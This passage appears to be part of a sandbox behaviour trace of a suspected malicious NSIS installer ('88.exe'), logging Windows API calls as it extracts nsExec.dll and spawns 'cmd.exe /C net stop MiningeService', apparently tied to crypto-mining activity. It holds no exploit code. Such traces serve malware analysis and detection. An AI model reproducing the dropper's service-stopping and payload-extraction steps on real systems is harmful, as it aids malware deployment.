(lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll")) returned 0xffffffff [0261.679] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0261.679] lstrcpynA (in: lpString1=0x42a048, lpString2="Extract: ", iMaxLength=1024 | out: lpString1="Extract: ") returned="Extract: " [0261.679] lstrlenA (lpString="Extract: ") returned 9 [0261.679] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 59 [0261.679] lstrcatA (in: lpString1="Extract: ", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" | out: lpString1="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0261.679] SetFilePointer (in: hFile=0x1e0, lDistanceToMove=63401, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7a9 [0261.679] ReadFile (in: hFile=0x1e0, lpBuffer=0x2d6fdac, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x2d6fdac*, lpNumberOfBytesRead=0x2d6fd28*=0x4, lpOverlapped=0x0) returned 1 [0261.680] GetTickCount () returned 0x1d5f674 [0261.680] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0xc2e, lpOverlapped=0x0) returned 1 [0261.680] GetTickCount () returned 0x1d5f674 [0261.680] MulDiv (nNumber=3118, nNumerator=100, nDenominator=3118) returned 100 [0261.680] wsprintfA (in: param_1=0x2d6fd44, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0261.680] lstrlenA (lpString="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 68 [0261.680] lstrlenA (lpString="... 100%") returned 8 [0261.680] lstrcatA (in: lpString1="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", lpString2="... 100%" | out: lpString1="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll... 100%") returned="Extract: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll... 100%" [0261.680] WriteFile (in: hFile=0x208, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1a00, lpOverlapped=0x0) returned 1 [0261.681] CloseHandle (hObject=0x208) returned 1 [0261.682] MulDiv (nNumber=26, nNumerator=30000, nDenominator=60) returned 13000 [0261.682] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x32c8, lParam=0x0) returned 0x30d4 [0261.683] MulDiv (nNumber=27, nNumerator=30000, nDenominator=60) returned 13500 [0261.683] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x34bc, lParam=0x0) returned 0x32c8 [0261.684] GetVersion () returned 0x1db10106 [0261.684] GetSystemDirectoryA (in: lpBuffer=0x42e3a0, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0261.685] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0261.685] lstrcpynA (in: lpString1=0x2aadcc, lpString2="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService", iMaxLength=1024 | out: lpString1="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService") returned="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService" [0261.685] MulDiv (nNumber=28, nNumerator=30000, nDenominator=60) returned 14000 [0261.685] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x36b0, lParam=0x0) returned 0x34bc [0261.686] lstrcpynA (in: lpString1=0x2ab1dc, lpString2="/OEM", iMaxLength=1024 | out: lpString1="/OEM") returned="/OEM" [0261.686] MulDiv (nNumber=29, nNumerator=30000, nDenominator=60) returned 14500 [0261.686] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x38a4, lParam=0x0) returned 0x36b0 [0261.686] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.687] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.687] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0261.687] lstrcpynA (in: lpString1=0x40a410, lpString2="ExecToLog", iMaxLength=1024 | out: lpString1="ExecToLog") returned="ExecToLog" [0261.688] GetModuleHandleA (lpModuleName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 0x0 [0261.690] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", hFile=0x0, dwFlags=0x8) returned 0x2d70000 [0261.700] GetProcAddress (hModule=0x2d70000, lpProcName="ExecToLog") returned 0x2d7102d [0261.700] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0261.700] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0261.700] GetCurrentProcess () returned 0xffffffff [0261.700] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2d6fb40 | out: Wow64Process=0x2d6fb40*=1) returned 1 [0261.700] FindWindowExA (hWndParent=0x401e4, hWndChildAfter=0x0, lpszClass="#32770", lpszWindow=0x0) returned 0x40300 [0261.700] FindWindowExA (hWndParent=0x40300, hWndChildAfter=0x0, lpszClass="SysListView32", lpszWindow=0x0) returned 0x302f8 [0261.700] lstrcpyA (in: lpString1=0x2ab5e8, lpString2="/OEM" | out: lpString1="/OEM") returned="/OEM" [0261.701] lstrlenA (lpString="/TIMEOUT=") returned 9 [0261.701] lstrlenA (lpString="/OEM") returned 4 [0261.701] lstrcmpiA (lpString1="/OEM", lpString2="/OEM") returned 0 [0261.701] lstrcpyA (in: lpString1=0x2ab5e8, lpString2="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService" | out: lpString1="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService") returned="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService" [0261.702] lstrlenA (lpString="/TIMEOUT=") returned 9 [0261.702] lstrlenA (lpString="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService") returned 54 [0261.702] lstrcmpiA (lpString1="C:\\Window", lpString2="/TIMEOUT=") returned 1 [0261.702] lstrlenA (lpString=":\\Windows\\system32\\cmd.exe /C net stop MiningeService") returned 53 [0261.702] lstrcmpiA (lpString1=":\\Windows", lpString2="/TIMEOUT=") returned 1 [0261.703] lstrlenA (lpString="\\Windows\\system32\\cmd.exe /C net stop MiningeService") returned 52 [0261.703] lstrcmpiA (lpString1="\\Windows\\", lpString2="/TIMEOUT=") returned 1 [0261.703] lstrlenA (lpString="Windows\\system32\\cmd.exe /C net stop MiningeService") returned 51 [0261.703] lstrcmpiA (lpString1="Windows\\s", lpString2="/TIMEOUT=") returned 1 [0261.703] lstrlenA (lpString="indows\\system32\\cmd.exe /C net stop MiningeService") returned 50 [0261.703] lstrcmpiA (lpString1="indows\\sy", lpString2="/TIMEOUT=") returned 1 [0261.704] lstrlenA (lpString="ndows\\system32\\cmd.exe /C net stop MiningeService") returned 49 [0261.704] lstrcmpiA (lpString1="ndows\\sys", lpString2="/TIMEOUT=") returned 1 [0261.704] lstrlenA (lpString="dows\\system32\\cmd.exe /C net stop MiningeService") returned 48 [0261.704] lstrcmpiA (lpString1="dows\\syst", lpString2="/TIMEOUT=") returned 1 [0261.704] lstrlenA (lpString="ows\\system32\\cmd.exe /C net stop MiningeService") returned 47 [0261.704] lstrcmpiA (lpString1="ows\\syste", lpString2="/TIMEOUT=") returned 1 [0261.704] lstrlenA (lpString="ws\\system32\\cmd.exe /C net stop MiningeService") returned 46 [0261.705] lstrcmpiA (lpString1="ws\\system", lpString2="/TIMEOUT=") returned 1 [0261.705] lstrlenA (lpString="s\\system32\\cmd.exe /C net stop MiningeService") returned 45 [0261.705] lstrcmpiA (lpString1="s\\system3", lpString2="/TIMEOUT=") returned 1 [0261.705] lstrlenA (lpString="\\system32\\cmd.exe /C net stop MiningeService") returned 44 [0261.705] lstrcmpiA (lpString1="\\system32", lpString2="/TIMEOUT=") returned 1 [0261.705] lstrlenA (lpString="system32\\cmd.exe /C net stop MiningeService") returned 43 [0261.705] lstrcmpiA (lpString1="system32\\", lpString2="/TIMEOUT=") returned 1 [0261.705] lstrlenA (lpString="ystem32\\cmd.exe /C net stop MiningeService") returned 42 [0261.706] lstrcmpiA (lpString1="ystem32\\c", lpString2="/TIMEOUT=") returned 1 [0261.706] lstrlenA (lpString="stem32\\cmd.exe /C net stop MiningeService") returned 41 [0261.706] lstrcmpiA (lpString1="stem32\\cm", lpString2="/TIMEOUT=") returned 1 [0261.706] lstrlenA (lpString="tem32\\cmd.exe /C net stop MiningeService") returned 40 [0261.706] lstrcmpiA (lpString1="tem32\\cmd", lpString2="/TIMEOUT=") returned 1 [0261.706] lstrlenA (lpString="em32\\cmd.exe /C net stop MiningeService") returned 39 [0261.706] lstrcmpiA (lpString1="em32\\cmd.", lpString2="/TIMEOUT=") returned 1 [0261.707] lstrlenA (lpString="m32\\cmd.exe /C net stop MiningeService") returned 38 [0261.707] lstrcmpiA (lpString1="m32\\cmd.e", lpString2="/TIMEOUT=") returned 1 [0261.707] lstrlenA (lpString="32\\cmd.exe /C net stop MiningeService") returned 37 [0261.707] lstrcmpiA (lpString1="32\\cmd.ex", lpString2="/TIMEOUT=") returned 1 [0261.707] lstrlenA (lpString="2\\cmd.exe /C net stop MiningeService") returned 36 [0261.707] lstrcmpiA (lpString1="2\\cmd.exe", lpString2="/TIMEOUT=") returned 1 [0261.707] lstrlenA (lpString="\\cmd.exe /C net stop MiningeService") returned 35 [0261.707] lstrcmpiA (lpString1="\\cmd.exe ", lpString2="/TIMEOUT=") returned 1 [0261.708] lstrlenA (lpString="cmd.exe /C net stop MiningeService") returned 34 [0261.708] lstrcmpiA (lpString1="cmd.exe /", lpString2="/TIMEOUT=") returned 1 [0261.708] lstrlenA (lpString="md.exe /C net stop MiningeService") returned 33 [0261.708] lstrcmpiA (lpString1="md.exe /C", lpString2="/TIMEOUT=") returned 1 [0261.708] lstrlenA (lpString="d.exe /C net stop MiningeService") returned 32 [0261.708] lstrcmpiA (lpString1="d.exe /C ", lpString2="/TIMEOUT=") returned 1 [0261.708] lstrlenA (lpString=".exe /C net stop MiningeService") returned 31 [0261.708] lstrcmpiA (lpString1=".exe /C n", lpString2="/TIMEOUT=") returned -1 [0261.709] lstrlenA (lpString="exe /C net stop MiningeService") returned 30 [0261.709] lstrcmpiA (lpString1="exe /C ne", lpString2="/TIMEOUT=") returned 1 [0261.709] lstrlenA (lpString="xe /C net stop MiningeService") returned 29 [0261.709] lstrcmpiA (lpString1="xe /C net", lpString2="/TIMEOUT=") returned 1 [0261.709] lstrlenA (lpString="e /C net stop MiningeService") returned 28 [0261.709] lstrcmpiA (lpString1="e /C net ", lpString2="/TIMEOUT=") returned 1 [0261.709] lstrlenA (lpString=" /C net stop MiningeService") returned 27 [0261.709] lstrcmpiA (lpString1=" /C net s", lpString2="/TIMEOUT=") returned -1 [0261.710] lstrlenA (lpString="/C net stop MiningeService") returned 26 [0261.710] lstrcmpiA (lpString1="/C net st", lpString2="/TIMEOUT=") returned -1 [0261.710] lstrlenA (lpString="C net stop MiningeService") returned 25 [0261.710] lstrcmpiA (lpString1="C net sto", lpString2="/TIMEOUT=") returned 1 [0261.710] lstrlenA (lpString=" net stop MiningeService") returned 24 [0261.710] lstrcmpiA (lpString1=" net stop", lpString2="/TIMEOUT=") returned -1 [0261.710] lstrlenA (lpString="net stop MiningeService") returned 23 [0261.710] lstrcmpiA (lpString1="net stop ", lpString2="/TIMEOUT=") returned 1 [0261.711] lstrlenA (lpString="et stop MiningeService") returned 22 [0261.711] lstrcmpiA (lpString1="et stop M", lpString2="/TIMEOUT=") returned 1 [0261.711] lstrlenA (lpString="t stop MiningeService") returned 21 [0261.711] lstrcmpiA (lpString1="t stop Mi", lpString2="/TIMEOUT=") returned 1 [0261.711] lstrlenA (lpString=" stop MiningeService") returned 20 [0261.711] lstrcmpiA (lpString1=" stop Min", lpString2="/TIMEOUT=") returned -1 [0261.711] lstrlenA (lpString="stop MiningeService") returned 19 [0261.711] lstrcmpiA (lpString1="stop Mini", lpString2="/TIMEOUT=") returned 1 [0261.712] lstrlenA (lpString="top MiningeService") returned 18 [0261.712] lstrcmpiA (lpString1="top Minin", lpString2="/TIMEOUT=") returned 1 [0261.712] lstrlenA (lpString="op MiningeService") returned 17 [0261.712] lstrcmpiA (lpString1="op Mining", lpString2="/TIMEOUT=") returned 1 [0261.712] lstrlenA (lpString="p MiningeService") returned 16 [0261.713] lstrcmpiA (lpString1="p Mininge", lpString2="/TIMEOUT=") returned 1 [0261.713] lstrlenA (lpString=" MiningeService") returned 15 [0261.713] lstrcmpiA (lpString1=" MiningeS", lpString2="/TIMEOUT=") returned -1 [0261.714] lstrlenA (lpString="MiningeService") returned 14 [0261.714] lstrcmpiA (lpString1="MiningeSe", lpString2="/TIMEOUT=") returned 1 [0261.714] lstrlenA (lpString="iningeService") returned 13 [0261.714] lstrcmpiA (lpString1="iningeSer", lpString2="/TIMEOUT=") returned 1 [0261.714] lstrlenA (lpString="ningeService") returned 12 [0261.714] lstrcmpiA (lpString1="ningeServ", lpString2="/TIMEOUT=") returned 1 [0261.714] lstrlenA (lpString="ingeService") returned 11 [0261.714] lstrcmpiA (lpString1="ingeServi", lpString2="/TIMEOUT=") returned 1 [0261.715] lstrlenA (lpString="ngeService") returned 10 [0261.715] lstrcmpiA (lpString1="ngeServic", lpString2="/TIMEOUT=") returned 1 [0261.715] lstrlenA (lpString="geService") returned 9 [0261.715] lstrcmpiA (lpString1="geService", lpString2="/TIMEOUT=") returned 1 [0261.715] lstrlenA (lpString="eService") returned 8 [0261.715] lstrcmpiA (lpString1="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService", lpString2="/OEM") returned 1 [0261.715] GetVersion () returned 0x1db10106 [0261.715] GlobalLock (hMem=0x224003c) returned 0x2ab9f8 [0261.715] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x2d6fd20, dwRevision=0x1 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0261.715] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2d6fd20, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0261.715] CreatePipe (in: hReadPipe=0x2d6fd74, hWritePipe=0x2d6fd68, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd74*=0x1c, hWritePipe=0x2d6fd68*=0x20c) returned 1 [0261.716] CreatePipe (in: hReadPipe=0x2d6fd58, hWritePipe=0x2d6fd6c, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd58*=0x210, hWritePipe=0x2d6fd6c*=0x214) returned 1 [0261.716] GetStartupInfoA (in: lpStartupInfo=0x2d6fcdc | out: lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0261.716] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x10, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x214, hStdOutput=0x20c, hStdError=0x20c), lpProcessInformation=0x2d6fd34 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C net stop MiningeService", lpProcessInformation=0x2d6fd34*(hProcess=0x21c, hThread=0x218, dwProcessId=0xcdc, dwThreadId=0xcec)) returned 1 [0261.734] GetTickCount () returned 0x1d5f6b2 [0261.734] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0261.735] Sleep (dwMilliseconds=0x64) [0262.183] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0262.183] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0262.183] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0262.183] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0262.183] Sleep (dwMilliseconds=0x64) [0262.293] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0262.293] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0262.293] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0262.293] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0262.293] Sleep (dwMilliseconds=0x64) [0262.401] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0262.401] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0262.401] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0262.401] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0262.401] Sleep (dwMilliseconds=0x64) [0262.508] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0262.508] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0262.508] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0262.508] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0262.508] Sleep (dwMilliseconds=0x64) [0263.725] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0263.725] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0263.725] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0263.725] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0263.725] Sleep (dwMilliseconds=0x64) [0263.835] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0263.836] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0263.836] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0263.836] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0263.837] Sleep (dwMilliseconds=0x64) [0263.943] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0263.943] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0263.943] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0263.943] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0263.943] Sleep (dwMilliseconds=0x64) [0264.052] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0264.052] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0264.053] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.053] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.053] Sleep (dwMilliseconds=0x64) [0264.162] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0264.163] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0264.163] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.163] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.163] Sleep (dwMilliseconds=0x64) [0264.279] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0264.279] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0264.279] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.279] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.279] Sleep (dwMilliseconds=0x64) [0264.381] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0264.381] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0264.381] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.381] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0264.381] Sleep (dwMilliseconds=0x64) [0264.490] WaitForSingleObject (hHandle=0x21c, 